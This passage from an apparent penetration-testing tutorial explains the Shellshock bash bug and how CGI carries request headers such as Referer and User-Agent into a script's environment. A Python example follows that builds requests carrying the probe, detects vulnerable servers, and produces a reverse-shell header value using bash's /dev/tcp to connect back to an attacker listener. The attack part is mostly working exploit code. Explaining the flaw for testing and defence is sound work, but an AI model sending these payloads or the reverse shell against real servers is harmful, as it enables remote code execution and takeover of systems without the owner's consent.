How it works...

In the first five steps, we discovered that the page called a shell script through CGI. A script like that is executed by a shell interpreter, so that interpreter might be bash, and possibly a vulnerable version of bash.
To verify that, we performed the following test:

() { :;}; echo "Vulnerable:" 

The first part, () { :;};, is an empty function definition. Bash can import function definitions from environment variables, and the core of the vulnerability (Shellshock) is that the parser did not stop at the end of the function body: it kept interpreting, and executing, whatever followed the closing brace. That lets us append the second part, echo "Vulnerable:", a command that simply prints its argument, so its output appearing in the response tells us the trailing command was executed.

The vulnerability is reachable through the web server because the CGI interface copies the request headers into the script's environment (Referer becomes HTTP_REFERER, User-Agent becomes HTTP_USER_AGENT, Accept-Language becomes HTTP_ACCEPT_LANGUAGE, and so on), and a vulnerable bash imported function definitions from any environment variable when it started. The attack therefore works just as well through User-Agent or Accept-Language as through Referer. Once we know the server is vulnerable, we issue a test command, ifconfig, and set up a reverse shell.

A reverse shell is a remote shell in which the connection is initiated by the compromised server: our machine listens for an incoming connection and the target connects back to it. This is the reverse of a bind shell, where the target listens on a port and we connect to it. The difference matters when a firewall blocks inbound connections to the server but allows the server to make outbound ones.
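To make the mechanism described above concrete, here is an added Python example (not code from the original recipe or the book). It maps header names to the CGI environment variables that carry them into bash, builds the raw request that places the probe in any of those headers, checks a response for the marker (and, as a fallback, for the status change Apache produces when the stray output is rejected as a malformed script header), builds the connect-back header value used for the reverse shell, and reproduces the function-import bug locally by handing the same probe to bash as an environment variable. The host address, CGI path and listener address are made-up values, and the response texts are constructed for the illustration.

```python
"""Shellshock probe through CGI request headers (added example, not from the book)."""
import shutil
import subprocess
from typing import Optional

# Constructed values for the illustration: target host, CGI path and the
# attacker's listener are assumptions, not details from the original page.
TARGET_HOST = "192.168.56.102"
CGI_PATH = "/cgi-bin/status.sh"
MARKER = "Vulnerable:"

# The probe from the text: an empty function definition followed by a
# trailing command that only an unpatched bash will execute.
PROBE = '() { :;}; echo "%s"' % MARKER


def cgi_env_name(header: str) -> str:
    """Environment variable name a CGI gateway exports for a request header
    (RFC 3875: uppercase, '-' becomes '_', 'HTTP_' prefix). This mapping is
    why Referer, User-Agent and Accept-Language all reach the shell."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


def build_probe_request(host: str, path: str, header: str, payload: str = PROBE) -> str:
    """Raw HTTP/1.1 request carrying the payload in the chosen header."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        f"{header}: {payload}",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def looks_vulnerable(response: str, marker: str = MARKER) -> bool:
    """Direct check: the trailing echo ran if its marker shows up anywhere in
    the raw response (headers and body are both searched on purpose, because
    the echo runs before the script prints its own CGI headers)."""
    return marker in response


def status_code(response: str) -> int:
    """Status code from the first line of a raw HTTP response."""
    return int(response.split("\r\n", 1)[0].split(" ")[1])


def status_changed(baseline: str, probed: str) -> bool:
    """Weaker signal: Apache's mod_cgi rejects script output that is not a
    valid header ("malformed header from script") and answers 500, so a 200
    for the plain request that turns into a 500 with the probe suggests the
    header was interpreted even if the marker never reaches the client."""
    return status_code(baseline) == 200 and status_code(probed) == 500


def reverse_shell_payload(attacker_host: str, attacker_port: int) -> str:
    """Header value that, on a vulnerable host, connects an interactive bash
    back to our listener (for example nc -lvp <port>) through bash's
    /dev/tcp pseudo-device; the attacker address is an assumption."""
    return (
        "() { :;}; /bin/bash -c "
        f"'bash -i >& /dev/tcp/{attacker_host}/{attacker_port} 0>&1'"
    )


def local_bash_vulnerable() -> Optional[bool]:
    """Reproduce the core bug without a web server: export the probe as an
    environment variable and start bash. An unpatched bash prints the marker
    while importing the variable; a patched one prints nothing.
    Returns None when bash is not installed."""
    if shutil.which("bash") is None:
        return None
    env = {"PATH": "/usr/bin:/bin", "PROBE": PROBE}
    out = subprocess.run(
        ["bash", "-c", "true"], env=env, capture_output=True, text=True
    ).stdout
    return MARKER in out


if __name__ == "__main__":
    for header in ("Referer", "User-Agent", "Accept-Language"):
        print(f"{header} -> {cgi_env_name(header)}")
    print(build_probe_request(TARGET_HOST, CGI_PATH, "Referer"))
    print("local bash vulnerable:", local_bash_vulnerable())
```

Send the request built by build_probe_request over a plain TCP socket (or paste the header into a proxy such as Burp) and feed the raw reply to looks_vulnerable; keep a reply to the unmodified request so status_changed has a baseline to compare against.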

Once we have a shell on the server, the next steps are to escalate privileges and gather the information needed for the rest of the penetration test.
